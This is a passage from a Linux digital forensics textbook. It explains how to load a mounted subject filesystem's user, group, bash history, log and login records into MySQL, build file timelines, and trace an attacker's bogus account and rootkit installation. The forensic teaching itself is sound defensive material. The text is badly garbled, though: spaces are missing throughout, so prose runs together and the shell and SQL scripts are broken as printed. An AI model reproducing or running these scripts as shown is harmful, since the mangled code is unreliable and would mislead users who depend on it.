AstutereadersmayhavenoticedthatourscriptimporteduserandgroupIDs,notnames.Thiswasintentional.Whydidwedoitthisway?Ifyoustoptothinkaboutit,itwilloccurtoyouthatwhenyoulistfilesonyourLinuxmachineusingls,thelsprogramisusingthepasswordfiletotranslateduserandgroupIDsstoredintheinodes(moreabouttheselater in the book) to names.You havemounted a filesystem from another computer onyour forensics workstation and ls will use your /etc/passwd and /etc/group files totranslateIDstonames,notthecorrectfilesfromthesubjectsystem.ThisissueisshowninFigure6.9whereallofthejohnuser’sfilesreportthattheybelongtothephiluserbecausethe user ID for john on the subject system is the same as the user ID for phil onmyforensicsworkstation.IncaseswheretheuserIDisnotfoundontheforensicsworkstationtherawuserIDisdisplayedratherthantheincorrectname.
FIGURE6.9
Usernamesincorrectlydisplayedforamountedsubjectfilesystem.
Wecaneasilydisplaythecorrectuserandgroupnameinqueriesofourdatabaseifwecreate two new tables and import the /etc/passwd and /etc/group files from the subjectsystem. This is straightforward thanks to the fact that these files are already colondelimited. Importing this information is as simple as copying the subject’s passwd andgroup files to /tmp (or some other directory MySQL has been configured to use forimports),andthenrunningthefollowingSQLscript.createtableusers(
usernamevarchar(255)notnull,
passwordHashvarchar(255)notnull,
uidintnotnull,
gidintnotnull,
userInfovarchar(255)notnull,
homeDirvarchar(255)notnull,
shellvarchar(2048)notnull,
primarykey(username)
);
loaddatainfile‘/tmp/passwd’
intotableusers
fieldsterminatedby‘:’
enclosedby‘”’
linesterminatedby‘\n’;
createtablegroups(
groupnamevarchar(255)notnull,
passwordHashvarchar(255)notnull,
gidintnotnull,
userlistvarchar(2048)
);
loaddatainfile‘/tmp/group’
intotablegroups
fieldsterminatedby‘:’
enclosedby‘”’
linesterminatedby‘\n’;
Thiscodeisabitsimplerthantheimportforourmetadatafile.Theprimaryreasonforthisisthattherearenodatesorothercomplexobjectstoconvert.YouwillnotethatIhaveusedtheusernameandnottheuserIDastheprimarykeyfortheuserstable.ThereasonforthisisthatifanattackerhasaddedanaccountwithaduplicateID,theimportwouldfail as primary keys must be unique. It is not unusual for an attacker to create a newaccountthatsharesanID,especiallyID0fortherootuser.ExecutingthescriptabovetoloadthesetwotablesisshowninFigure6.10.
FIGURE6.10
ImportinguserandgroupinformationintoMySQL.
NowthattheuserinformationhasbeenimportedIcanperformsomesimplequeries.Itmightbeusefultoseewhatshellsarebeingusedforeachuser.Anattackermightchangetheshellofsystemaccountstoallowlogin.Suchaccountsnormallyhavealoginshellof/usr/sbin/nologin or /bin/false. The results of executing the query select * fromusersorderbyuid;areshowninFigure6.11.Theresultsshowthatanattacker
hascreatedabogusjohnnaccount.
FIGURE6.11
Selectingusersfromthedatabase.Notethebogusjohnnaccountthathasbeencreatedbyanattacker.
IfanattackerhasreusedauserID,thatiseasilydetected.InadditiontolookingattheresultsfromthepreviousqueryinordertoseeeverythingintheuserstablesortedbyuserID,anotherquerywill instantlyletyouknowifduplicateIDsexist.Thequeryselectdistinct uid from users; should return the same number of rows as theprevious query (38 in the case of the subject system). If it returns anything less, thenduplicatesexist.
Isthereanyvalueinviewingthegroupfileinformation?Yes.Thegroupfilecontainsalistofuserswhobelongtoeachgroup.Ifanattackerhasaddedhimself/herselftoagroup,it will show up here. New users in the sudo, adm, or wheel groups that are used todeterminewhogetsrootprivileges(theexactgroupandmechanismvariesfromoneLinuxdistributiontothenext)areparticularlyinteresting.Evenknowingwhichlegitimateusersare in these groups can be helpful if you think an attacker has gained root access.Theresultsofrunningthequeryselect*fromgroupsorderbygroupname;areshowninFigure6.12.Itwouldappearfromthisinformationthatthejohnaccounthasadministrative privileges. The query select distinct gid from groups;shouldreturnthesamenumberofrowsiftherearenoduplicategroupnumbers.
FIGURE6.12
Examininggroupfileinformation.
Let’sreturntothefilestable.Afterall,wesaidourmotivationforimportingusersandgroupswastodisplaycorrectinformation.Inordertodisplayusernamesinourquerieswemustdoadatabasejoin.IfyouarenotaSQLexpert,fearnot,thekindofjoinneededhereissimple.Weneedonlyselectfrommorethanonetableandgivetheconditionthatjoins(associates)rowsinthevarioustables.
Ifwewishtoaddusernamestothepreviousqueryofthefilestablesomethinglikethefollowing will work: select accessdate, accesstime, filename,permissions, username from files, users wherefiles.userid=users.uid order by accessdate desc, accesstimedesc.Whathavewechanged?Wehavegonefromthecatchallselect*toanexplicitlistofcolumns.Asecondtablehasbeenaddedtothefromclause.Finally,wehaveajoinclause,wherefiles.userid=users.uid,thatdetermineswhichrowintheuserstableisusedtoretrievetheusername.Ifanyofthecolumnnamesinthelistexistinbothtablesyoumustprefixthecolumnnamewith<table>.totellMySQLwhichtabletouse.TheresultsofrunningthisqueryareshowninFigure6.13.
FIGURE6.13
ResultsofrunningqueryonfilesTablewithusernamesfromuserstable.
NoticethatFigure6.13showsatextfileingedit.HerewehaveusedausefulfeatureoftheMySQLclient,thetee<logfile>command.Thiscommandissimilartotheshellcommandwiththesamenameinthatitcausesoutputtogobothtothescreenandalsotoaspecified file.Thisallowsallqueryoutput tobecaptured.Thiscanbeauseful thing tostore in your case directory. When you no longer want to capture output the noteecommand will close the file and stop sending information. You might wish to teeeverythingtoonebiglogfileforallyourqueriesorstorequeriesintheirownfiles,yourchoice.MySQL has shortcuts for many commands including\T and\t fortee andnotee,respectively.
YoumayhavenoticedthatIprimarilyliketousecommandlinetools.Irealizethatnoteveryone shares my passion for command line programs. There is absolutely nothingstoppingyou fromusing thepowerfulMySQL techniquesdescribed in thisbookwithinPhpMyAdmin,MySQLWorkbench,oranyotherGraphicalUserInterface(GUI)tool.
Couldyoustilldolotsofforensicswithoutusingadatabase?Yes,youcertainlycouldandpeopledo.However, ifyou lookatavailable tools suchasAutopsyyouwillnoticethat theyare relatively slowwhenyouput themupagainstqueryingaproperdatabase.ThereisanotherreasonIprefertoimportdataintoadatabase.Doingsoisinfinitelymoreflexible.Seethesidebarforaperfectexample.
YOUCAN’TGETTHEREFROMHEREWhentoolsfailyouI am remindedof a joke concerning a visitor to a large citywho asked a local fordirections.Thelocalrespondedtotherequestfordirectionsbysaying“Youcan’tgettherefromhere.”Sometimesthatisthecasewhenusingprepackagedtools.Theyjustdon’tdoexactlywhatyouwantandthereisnoeasywaytogetthemtoconformtoyourwill.
RecentlyinoneofmyforensicsclassesattheuniversitywhereIteachtherewasatechnicalissuewithoneofthecommercialtoolsweuse.Inanattempttosalvagetherestofmy75minuteclassperiodIturnedtoAutopsy.Itisfarfrombeingabadtooland ithassomenice features.Oneof the things it supports is filters.Youcanfilterfilesbysize,type,etc.Whatyoucannotdo,however,iscombinethesefilters.Thisisjustonesimpleexampleofsomethingthat isextremelyeasywithadatabase,but ifyouonlyhaveaprepackagedtools“Youcan’tgettherefromhere.”
Based on our live analysis of the subject system fromPFE,we know that the attackmost likelyoccurredduring themonthofMarch.Wealsosee that the johnaccountwasused in some way during the attack. As noted earlier in this chapter, this account hasadministrative privileges. We can combine these facts together to examine only filesaccessedandmodifiedfromMarchonwards thatareownedbyjohnor johnn(withuserIDsof1000and1001,respectively).All that isrequiredisafewadditionstothewhereclauseinourquerywhichnowreads:
select accessdate, accesstime, filename, permissions,username from files, users where files.userid=users.uidand modifydate > date(‘2015-03-01’) and accessdate >date(‘2015-03-01’) and (files.userid=1000 orfiles.userid=1001) order by accessdate desc, accesstimedesc;.
Wecouldhaveusedtheuserstabletomatchbasedonusername,butitisabiteasiertouse theuserIDsandprevents theneedfora joinwith theusers table.Thisqueryran in0.13 seconds on my laptop and returned only 480 rows, a reduction of over 867,000records.Thisallowsyoutoeliminate thenoiseandhomeinontherelevant informationsuchasthatshowninFigure6.14andFigure6.15.
FIGURE6.14
Evidenceofarootkitdownload.
FIGURE6.15
Evidenceofloggingintoabogusaccount.Notethatthemodifiedfilesforthejohnaccountsuggestthattheattackerinitiallyloggedinwiththisaccount,switchedtothejohnnaccountasatest,andthenloggedoff.
CREATINGATIMELINEAswesaidpreviously,makingaproper timelinewithaccess,modification,andcreationtimes intertwined isnot easywitha simple spreadsheet. It isquiteeasilydonewithourdatabase,however.Theshellscriptbelow(whichisprimarilyjustaSQLscript)willcreateanewtimelinetableinthedatabase.Thetimelinetablewillallowustoeasilyandquicklycreatetimelines.#!/bin/bash
#
#create-timeline.sh
#
#Simpleshellscripttocreateatimelineinthedatabase.
#
#DevelopedforPentesterAcademyby
#Dr.PhilPolstra(@ppolstra)
usage(){
echo“usage:$0<database>”
echo“Simplescripttocreateatimelineinthedatabase”
exit1
}
if[$#-lt1];then
usage
fi
cat<<EOF|mysql$1-uroot-p
createtabletimeline(
Operationchar(1),
Datedatenotnull,
Timetimenotnull,
recnobigintnotnull
);
insertintotimeline(Operation,Date,Time,recno)
select“A”,accessdate,accesstime,recnofromfiles;
insertintotimeline(Operation,Date,Time,recno)
select“M”,modifydate,modifytime,recnofromfiles;
insertintotimeline(Operation,Date,Time,recno)
select“C”,createdate,createtime,recnofromfiles;
EOF
Thereisonetechniqueinthisscriptthatrequiresexplainingasithasnotbeenusedthusfarinthisbook.Therelevantlineiscat<<EOF|mysql$1-uroot-p.Thisconstructwill cat (typeout) everything from the following lineuntil the stringafter<<(whichis‘EOF’inourcase) isencountered.Allof theselinesarethenpipedtomysql
which is run against the passed in database ($1) with user root who must supply apassword.
Looking at the SQL in this script we see that a table is created that contains a onecharacteroperationcode,date, time, and recordnumber.After the table is created threeinsertstatementsareexecutedtoinsertaccess,modification,andcreationtimestampsintothetable.Notethatrecnointhetimelinetableistheprimarykeyfromthefilestable.Nowthat we have a table with all three timestamps, a timeline can be quickly and easilycreated.Thisscriptraninundertwosecondsonmylaptop.
ForconvenienceIhavecreatedashellscriptthatacceptsadatabaseandastartingdateand then builds a timeline. This script also uses the technique thatwas new in the lastscript.Notethatyoucanchangetheformatstringforthestr_to_datefunctioninthisscriptifyouprefersomethingotherthanthestandardUSdateformat.#!/bin/bash
#
#print-timeline.sh
#
#Simpleshellscripttoprintatimeline.
#
#DevelopedforPentesterAcademyby
#Dr.PhilPolstra(@ppolstra)
usage(){
echo“usage:$0<database><startingdate>”
echo“Simplescripttogettimelinefromthedatabase”
exit1
}
if[$#-lt2];then
usage
fi
cat<<EOF|mysql$1-uroot-p
selectOperation,timeline.date,timeline.time,
filename,permissions,userid,groupid
fromfiles,timeline
wheretimeline.date>=str_to_date(“$2”,“%m/%d/%Y”)and
files.recno=timeline.recno
orderbytimeline.datedesc,timeline.timedesc;
EOF
At thispoint I shouldprobably remindyou that the timestamps inour timelinecouldhavebeenalteredbyasophisticatedattacker.Wewilllearnhowtodetectthesealterationslaterinthisbook.Evenanattackerthatknowstoalterthesetimestampsmightmissafewfileshereandtherethatwillgiveyouinsightintowhathastranspired.
Thescriptabovewas runwithastartingdateofMarch1,2015.Recall fromour liveanalysisthatsomecommandssuchasnetstatandlsoffailedwhichleadustobelievethesystemmightbeinfectedwitharootkit.ThehighlightedsectioninFigure6.16showstheXingYiQuan rootkitwas downloaded into the john user’sDownloads directory at23:00:08on2015-03-05.AscanbeobservedinthehighlightedportionofFigure6.17,thecompressedarchivethatwasdownloadedwasextractedat23:01:10onthesameday.
FIGURE6.16
Evidenceshowingthedownloadofarootkit.
FIGURE6.17
Evidenceofarootkitcompressedarchivebeinguncompressed.
ItappearsthattheattackerloggedoffanddidnotreturnuntilMarch9.AtthattimeheorsheseemstohavereadtherootkitREADMEfileusingmoreandthenbuilttherootkit.EvidencetosupportthiscanbefoundinFigure6.18.Itisunclearwhytheattackerwaitedseveraldaysbeforebuildingand installing the rootkit.Lookingat theREADMEfileonthe target system suggests an inexperienced attacker. There were 266 matches for thesearchstring“xingyi”inthetimelinefile.Therootkitappearstohavebeenrunrepeatedly.Thiscouldhavebeenduetoasystemcrash,reboot,orattackerinexperience.
FIGURE6.18
Evidenceshowingarootkitbeingbuiltandinstalled.
Wehavereallyjustscratchedthesurfaceofwhatwecandowithacoupleofdatabasetables full ofmetadata.You canmake up queries to your heart’s content.Wewill nowmove on to other common things you might wish to examine while your image ismounted.
EXAMININGBASHHISTORIESDuringourliveresponseweusedascripttoextractusers’bashcommandhistories.Herewewilldosomethingsimilarexceptthatwewillusethefilesystemimage.Wewillalsooptionallyimporttheresultsdirectlyintoadatabase.Thescripttodoallthisfollows.#!/bin/bash
#
#get-histories.sh
#
#Simplescripttogetalluserbashhistoryfilesand.
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<mountpointofroot>[databasename]”
echo“Simplescripttogetuserhistoriesand\
optionallystoretheminthedatabase”
exit1
}
if[$#-lt1];then
usage
fi
#findonlyfiles,filenameis.bash_history
#executeecho,cat,andechoforallfilesfound
olddir=$(pwd)
cd$1
findhome-typef-regextypeposix-extended\
-regex“home/[a-zA-Z.]+(/.bash_history)”\
-execawk‘{print“{};”$0}’{}\;\
|tee/tmp/histories.csv
#repeatfortheadminuser
findroot-typef-regextypeposix-extended\
-regex“root(/.bash_history)”\
-execawk‘{print“{};”$0}’{}\;\
|tee-a/tmp/histories.csv
cd$olddir
if[$#-gt1];then
chownmysql:mysql/tmp/histories.csv
cat<<EOF|mysql$2-uroot-p
createtableifnotexists‘histories’(
historyFilenamevarchar(2048)notnull,
historyCommandvarchar(2048)notnull,
recnobigintnotnullauto_increment,
primarykey(recno)
);
loaddatainfile“/tmp/histories.csv”
intotablehistories
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’;
EOF
fi
Back inChapter 3, our live response script simply displayed a banner, typed out thehistoryfilecontents,anddisplayedafooter.Thiswillnotworkasaformatifwewishtoimporttheresultsintoaspreadsheetand/ordatabase.Togetanoutputthatismoreeasilyimportedweuseawk.
Somereadersmaybeunfamiliarwithawk.ItwascreatedatBellLabsinthe1970sbyAlfredAho,PeterWeinberger,andBrianKernighan.Itsnamecomesfromthefirstlettersof the authors’ surnames.Awk is a text processing language.Themost common use ofawkinscriptsistheprintingofpositionalfieldsinalineoftext.
Simple awk usage is best learned by examples. For example, the command echo“one two three” | awk ‘{ print $1 $3 }’ will print “onethree”. Bydefaultfieldsareseparatedbywhitespaceinawk.Thethree-execclausesforthefindcommandinthescriptpresentedinChapter3havebeenreplacedwiththesingleclause-execawk‘{print“{};”$0}’{}\;.The$0inthisawkcommandreferstoanentireline.Thisprintsthefilenamefollowedbyasemicolonandtheneachlinefromthefile.
ThedatabasecodeisnewifwecomparethisscripttothesimilaroneinChapter3.Itisalsostraightforwardandusestechniquespreviouslydiscussed.Anotherthingthatisdonein this script is tochange theownerandgroupof theoutputhistories.csv file tomysql.Thisisdonetoavoidanycomplicationsloadingthefileintothedatabase.PartialresultsfromrunningthisscriptagainstourPFEsubjectsystemareshowninFigure6.19.
FIGURE6.19
Extractingbashcommandhistoriesfromtheimagefile.
Oncethehistoriesareloadedinthedatabasetheyareeasilydisplayedusingselect*fromhistoriesorderbyrecno.Thiswillgivealluserhistories.Realizethateachaccount’shistorywillbepresentedinorderforthatuser,butthereisnowaytotellwhenanyofthesecommandswereexecuted.Theproperquerytodisplaybashhistoryfora single user is select historyCommand from histories wherehistoryFilenamelike‘%<username>%’orderbyrecno;.
TheresultsofrunningthequeryselecthistoryCommandfromhistorieswherehistoryFilenamelike‘%.johnn%’orderbyrecno;areshowninFigure6.20.Fromthishistorywecanseethebogusjohnnuserranwtoseewhoelsewas logged in andwhat command they last executed, typed out the password file, andswitchedtotwouseraccountsthatshouldnothaveloginprivileges.
FIGURE6.20
Bashcommandhistoryforabogusaccountcreatedbyanattacker.Notethatthecommandsbeingrunarealsosuspicious.
Severalinterestingcommandsfromthejohnaccount’sbashhistoryareshowninFigure6.21.Itcanbeseenthatthisusercreatedthejohnnaccount,copied/bin/trueto/bin/false,created passwords for whoopsie and lightdm, copied /bin/bash to /bin/false, edited thegroup file, move the johnn user’s home directory from /home/johnn to /home/.johnn(whichmadethedirectoryhidden),editedthepasswordfile,displayedthemanpageforsed,usedsedtomodifythepasswordfile,andinstalledarootkit.Copying/bin/bashto/bin/false was likely done to allow system accounts to log in. This might also be onesourceoftheconstant“Systemproblemdetected”popupmessages.
FIGURE6.21
Evidenceofmultipleactionsbyanattackerusingthejohnaccount.
EXAMININGSYSTEMLOGSWemightwant to have a look at various system log files as part of our investigation.Thesefilesarelocatedunder/var/log.Aswediscussedpreviously,someoftheselogsareinsubdirectoriesandothersinthemain/var/logdirectory.Withafewexceptionsthesearetext logs.Somehave archivesof the form<base log file>.n,wheren is an integer, andolder archives may be compressed with gzip. This leads to log files such as syslog,syslog.1,syslog.2.gz,syslog.3.gz,etc.beingcreated.
A script very similar to one from Chapter 3 allows us to capture log files for ouranalysis.Aswiththescriptfromtheearlierchapter,wewillonlycapturethecurrentlog.Ifit appears that archived logsmight be relevant to the investigation they can always beobtainedfromtheimagelater.Ourscriptfollows.#!/bin/bash
#
#get-logfiles.sh
#
#Simplescripttogetalllogsandoptionally
#storetheminadatabase.
#Warning:Thisscriptmighttakealongtimetorun!
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<mountpointofroot>[databasename]”
echo“Simplescripttogetlogfilesand”
echo“optionallystorethemtoadatabase.”
exit1
}
if[$#-1t1];then
usage
fi
#removeoldfileifitexists
if[-f/tmp/logfiles.csv];then
rm/tmp/logfiles.csv
fi
#findonlyfiles,excludefileswithnumbersastheyareoldlogs
#executeecho,cat,andechoforallfilesfound
olddir=$(pwd)
cd$1/var
findlog-typef-regextypeposix-extended\
-regex‘log/[a-zA-Z.]+(/[a-zA-Z.]+)*’\
-execawk‘{print“{};”$0}’{}\;\
|tee-a/tmp/logfiles.csv
cd$olddir
if[$#-gt1];then
chownmysql:mysql/tmp/logfiles.csv
clear
echo“Let’sputthatinthedatabase”
cat<<EOF|mysql$2-uroot-p
createtableifnotexistslogs(
logFilenamevarchar(2048)notnull,
logentryvarchar(2048)notnull,
recnobigintnotnullauto_increment,
primarykey(recno)
);
loaddatainfile“/tmp/logfiles.csv”
intotablelogs
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’;
EOF
fi
Therearenotechniquesusedin thisscript thathavenotbeendiscussedearlier in this
book.RunningthisagainstthePFEsubjectsystemyields74,832entriesinourdatabasein32logfiles.SomeoftheseresultsareshowninFigure6.22.
FIGURE6.22
Partialresultsofimportinglogfilesintothedatabase.
Recall that these logs fall into three basic categories. Some have absolutely no timeinformation, other give seconds since boot, while others give proper dates and times.Becauseofthisitisnormallynotpossibletobuildatimelineoflogentries.Thegeneralsyntax for a queryof a single log file isselectlogentryfromlogswherelogfilename like ‘%<log file>%’ order by recno;, i.e. selectlogentryfromlogswherelogfilenamelike‘%auth%’orderbyrecno;.PartialresultsfromthisqueryareshowninFigure6.23.Noticethatthecreationof the bogus johnn user and modifications to the lightdm and whoopsie accounts areclearlyshowninthisscreenshot.
FIGURE6.23
Evidenceoftheattacker’sactionsfromlogfiles.
If you are uncertainwhat logs have been imported, the queryselectdistinctlogfilenamefromlogs;willlistallofthelogfilescaptured.Ifyouarenotsurewhatkindofinformationisinaparticularlog,runaquery.Oneofthenicethingsaboutthismethod is that it is so quick and easy to look at anyof the logswithout having tonavigateamazeofdirectories.
Several of these logs, such as apt/history.log, apt/term.log, and dpkg.log, provideinformationonwhathasbeeninstalledviastandardmethods.Itisquitepossiblethatevenasavvyattackermightnotcleantheirtracksinalloftherelevantlogfiles.Itiscertainlyworthafewminutesofyourtimetobrowsethroughasamplingoftheselogs.
EXAMININGLOGINSANDLOGINATTEMPTSAs discussed in the previous section, most of the system logs are text files. Twoexceptionstothisnormarethebtmpandwtmpbinaryfileswhichstorefailedloginsandloginsessioninformation,respectively.Earlierinthisbook,whenweweretalkingaboutliveresponse,weintroducedthelastandlastbcommandswhichdisplayinformationfromwtmpandbtmp,respectively.
LikeallgoodLinuxutilities,thesetwocommandssupportanumberofcommandlineoptions.Thecommandlast-Faiwxwillproduceafulllisting(-F),append(-a)theIPaddressforremotelogins(-i),usethewideformat(-w),andincludeextrainformation(-x), such as when a user changed the run level. Running this command will provideinformationcontainedwithinthecurrentwtmpfileonly.Whatifyouwanttoviewolderinformation,perhapsbecausethecurrentfileisonlyacoupledaysold?Forthisandother
reasons,lastallowsyoutospecifyafileusingthe-foption.
The results of running last against the current and most recent archive wtmp areshown in Figure 6.24.This is a good example ofwhy you should look at the archivedwtmp (and btmp) files as well. The current wtmp file contains only three days ofinformation,butthearchivefilehasanadditionalmonthofdata.
FIGURE6.24
Runningthelastcommandonthecurrentandmostrecentarchivewtmpfiles.
Not surprisingly, we can create a script that will import the logins and failed loginattemptsintoourdatabase.Becausethesefilestendtobesmallerthansomeotherlogsandtheycancontainvaluablesinformation,thescriptpresentedhereloadsnotonlythecurrentfilesbutalsoanyarchives.Afewnewtechniquescanbefoundinthescriptthatfollows.#!/bin/bash
#
#get-logins.sh
#
#Simplescripttogetallsuccessfulandunsuccessful
#loginattemptsandoptionallystoretheminadatabase.
#
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
usage(){
echo“usage:$0<mountpointofroot>[databasename]”
echo“Simplescripttogetlogsofsuccessful“
echo“andunsucessfullogins.”
echo“Resultsmaybeoptionallystoredinadatabase”
exit1
}
if[[$#-lt1]];then
usage
fi
#usethelastandlastbcommandstodisplayinformation
#useawktocreate;separatedfields
#usesedtostripwhitespace
echo“who-what;terminal-event;start;stop;elapsedTime;ip”\
|tee/tmp/logins.csv
forlogfilein$1/var/log/wtmp*
do
last-aiFwx-f$logfile|\
awk‘{printsubstr($0,1,8)“;”substr($0,10,13)“;”\
substr($0,23,24)“;”substr($0,50,24)“;”substr($0,75,12)\
“;”substr($0,88,15)}’\
|sed‘s/[[:space:]]*;/;/g’|sed‘s/[[:space:]]+\n/\n/’\
|tee-a/tmp/logins.csv
done
echo“who-what;terminal-event;start;stop;elapsedTime;ip”\
|tee/tmp/login-fails.csv
forlogfilein$1/var/log/btmp*
do
lastb-aiFwx-f$logfile|\
awk‘{printsubstr($0,1,8)“;”substr($0,10,13)“;”\
substr($0,23,24)“;”substr($0,50,24)“;”substr($0,75,12)\
“;”substr($0,88,15)}’\
|sed‘s/[[:space:]]*;/;/g’|sed‘s/[[:space:]]+\n/\n/’\
|tee-a/tmp/login-fails.csv
done
if[$#-gt1];then
chownmysql:mysql/tmp/logins.csv
chownmysql:mysql/tmp/login-fails.csv
cat<<EOF|mysql$2-uroot-p
createtablelogins(
who_whatvarchar(8),
terminal_eventvarchar(13),
startdatetime,
stopdatetime,
elapsedvarchar(12),
ipvarchar(15),
recnobigintnotnullauto_increment,
primarykey(recno)
);
loaddatainfile“/tmp/logins.csv”
intotablelogins
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’
ignore1rows
(who_what,terminal_event,@start,@stop,elapsed,ip)
setstart=str_to_date(@start,“%a%b%e%H:%i:%s%Y”),
stop=str_to_date(@stop,“%a%b%e%H:%i:%s%Y”);
createtablelogin_fails(
who_whatvarchar(8),
terminal_eventvarchar(13),
startdatetime,
stopdatetime,
elapsedvarchar(12),
ipvarchar(15),
recnobigintnotnullauto_increment,
primarykey(recno)
);
loaddatainfile“/tmp/login-fails.csv”
intotablelogin_fails
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’
ignore1rows
(who_what,terminal_event,@start,@stop,elapsed,ip)
setstart=str_to_date(@start,“%a%b%e%H:%i:%s%Y”),
stop=str_to_date(@stop,“%a%b%e%H:%i:%s%Y”);
EOF
fi
This script startsout in theusualwayand isquite simple rightupuntil the lineforlogfile in $1/var/log/wtmp*. This is our first new item. The bash shellsupports a number of variations of a for loop. Readers familiar with C and similarprogramming languageshave seen for loops that are typicallyused to iterateover a list
where the number of iterations is known beforehand and an integer is incremented (ordecremented) with each step in the loop. Bash supports those types of loops and alsoallowsalooptobecreatedthatiteratesoverfilesthatmatchapattern.
Thepatterninourforloopwillmatchtheloginlogfile(wtmp)andanyarchivesofthesame.Thedoonthenextlinebeginsthecodeblockfortheloopanddonesevenlineslaterterminatesit.Thelastcommandisstraightforward,butthesamecannotbesaidoftheseriesofpipesthatfollow.Asusual,itiseasiertounderstandthecodeifyoubreakthislongcommanddownintoitssubparts.
Wehave seenawk, including the use of positional parameters such as $0 and $1, inprevious scripts. The substr function is new, however. The format for substr issubstr(<some string>, <starting index>, <max length>). Forexample, substr(“Hello there”, 1, 4) would return “Hell”. Notice thatindexes are 1-based, not 0-based as inmany other languages and programs. Once youunderstand how substr works, it isn’t difficult to see that this somewhat long awkcommand is printing six fields of output fromlast separated by semicolons. In orderthesefieldsaretowhomorwhatthisentryrefers,theterminaloreventforthisentry,starttime,stoptime,elapsedtime,andIPaddress.
There is stilla smallproblemwith the formattedoutput fromlast.Namely, there islikelyabunchofwhitespaceineachentrybeforethesemicolons.Thisiswheresed,thescriptededitor,comes in.Oneof themostpopularcommands insed is thesubstitutioncommand which has a general format ofs/<search pattern>/<replacementpattern>/<options>.While“/”isthetraditionalseparatorused,theusermayuseadifferent character (“#” is a common choice) if desired. The translation of sed‘s/[[:space:]]*;/;/g’issearchforzeroormorewhitespacecharactersbeforeasemicolon, if you find them substitute just a semicolon, anddo this globally (g option)whichinthiscontextmeansdonotstopwiththefirstmatchoneachline.Thesecondsedcommand,sed‘s/[[:space:]]+\n/\n/’, removeswhitespace from the end ofeach line (the IP field).Thecode forprocessingbtmp(failed logins)parallels thewtmpcode.
Thedatabasecodeissimilartowhatwehaveusedbefore.Onceagain,theonlysmallcomplicationisformattingthedateandtimeinformationoutputbylastandlastbintoaMySQLdatetimeobject.Someof theoutput from running this script against thePFEsubjectsystemisshowninFigure6.25.Note thatlastandlastb generate anemptylineandamessagestatingwhenthelogfilewascreated.Thisresultsinbogusentriesinyour database. My philosophy is that it is better to ignore these entries than to addconsiderablecomplicationtothescripttopreventtheircreation.
FIGURE6.25
Outputfromrunningloginsandfailedloginattemptsscript.Notethatthereareacoupleofemptyentriesanderroneouslinesthatfollow.
Thequeryselect*fromloginsorderbystart;willlistloginsessionsandselect*fromlogin_failsorderbystart;willdisplayfailedloginattempts.SomeoftheresultsfromthesequeriesareshowninFigure6.26.Inthefigureitcan be seen that the attacker failed to log in remotely from IP address 192.168.56.1 aslightdm on 2015-03-09 21:33:55. Around that same time the john, johnn, and lightdmaccounts had successful logins from the same IP address. The attacker appears to betestingsomenewlycreatedaccounts.
FIGURE6.26
Loginsessionsandfailedloginattempts.
OPTIONAL–GETTINGALLTHELOGSEarlier in this chapter we discussed importing the current log files into MySQL. Weignoredthearchivedlogstosavespaceandalsobecausetheymaybeuninteresting.Forthosethatwishtograbeverything,Iofferthefollowingscript.#!/bin/bash
#
#get-logfiles-ext.sh
#
#Simplescripttogetalllogsandoptionally
#storetheminadatabase.
#Warning:Thisscriptmighttakealongtimetorun!
#byDr.PhilPolstra(@ppolstra)asdevelopedfor
#PentesterAcademy.com.
#
#Thisisanextendedversionofget-logfiles.sh.
#Itwillattempttoloadcurrentlogsandarchivedlogs.
#Thiscouldtakealongtimeandrequiredlotsofstorage.
usage(){
echo“usage:$0<mountpointofroot>[databasename]”
echo“Simplescripttogetlogfilesand”
echo“optionallystorethemtoadatabase.”
exit1
}
if[$#-lt1];then
usage
fi
#removeoldfileifitexists
if[-f/tmp/logfiles.csv];then
rm/tmp/logfiles.csv
fi
olddir=$(pwd)
cd$1/var
forlogfilein$(findlog-typef-name‘*’)
do
ifecho$logfile|egrep-q“.gz$”;then
zcat$logfile|awk“{print\”$logfile;\”\$0}”\
|tee-a/tmp/logfiles.csv
else
awk“{print\”$logfile;\”\$0}”$logfile\
|tee-a/tmp/logfiles.csv
fi
done
cd“$olddir”
if[$#-gt1];then
chownmysql:mysql/tmp/logfiles.csv
clear
echo“Let’sputthatinthedatabase”
cat<<EOF|mysql$2-uroot-p
createtableifnotexistslogs(
logFilenamevarchar(2048)notnull,
logentryvarchar(2048)notnull,
recnobigintnotnullauto_increment,
primarykey(recno)
);
loaddatainfile“/tmp/logfiles.csv”
intotablelogs
fieldsterminatedby‘;’
enclosedby‘”’
linesterminatedby‘\n’;
EOF
fi
If you decide to go this route you will want to modify your queries slightly. Inparticular, you will want to add “order by logFilename desc, recno” to your selectstatementinordertopresentthingsinchronologicalorder.Forexample,toqueryalllogsyou would use select * from logs order by logfilename desc,recno. To examine a particular logfile use select logfilename, logentryfrom logs where logfilename like ‘%<base log filename>%’order by logfilename desc, recno, i.e., select logfilename,logentry from logs where logfilename like ‘%syslog%’ orderbylogfilenamedesc,recno.
SUMMARYInthischapterwehavelearnedtoextractinformationfromamountedsubjectfilesystemor filesystems. Many techniques were presented for analyzing this data in LibreOfficeand/oradatabase suchasMySQL. In thenext chapterwewilldig intoLinuxextendedfilesystemswhichwillallowus,amongotherthings,todetectdatathathasbeenalteredbyanattacker.
CHAPTER
7ExtendedFilesystemsINFORMATIONINTHISCHAPTER:
OrganizationofextendedfilesystemsSuperblocksCompatible,incompatible,andread-onlyfeaturesGroupdescriptorsInodesNewfeaturesinext4UsingPythontoreadfilesystemstructuresUsingshellscriptingtofindoutofplacefilesDetectingalterationofmetadatabyanattacker
EXTENDEDFILESYSTEMBASICSRunning Linux allows you to have lots of choices. This includes your choice offilesystems.Thatsaid,someversionoftheLinuxextendedfilesystemisfoundonthevastmajorityofLinuxsystems.ThesearecommonlyreferredtoasextNfilesystems,whereNistheversioninuse(normally2,3,or4).Theext2filesystemispopularforpartitionsthatdon’tchangeoftensuchasbootpartitions.MostLinuxdistributionsuseext4bydefaultongeneralusefilesystemssuchas/,/home,/usr,/opt,etc.
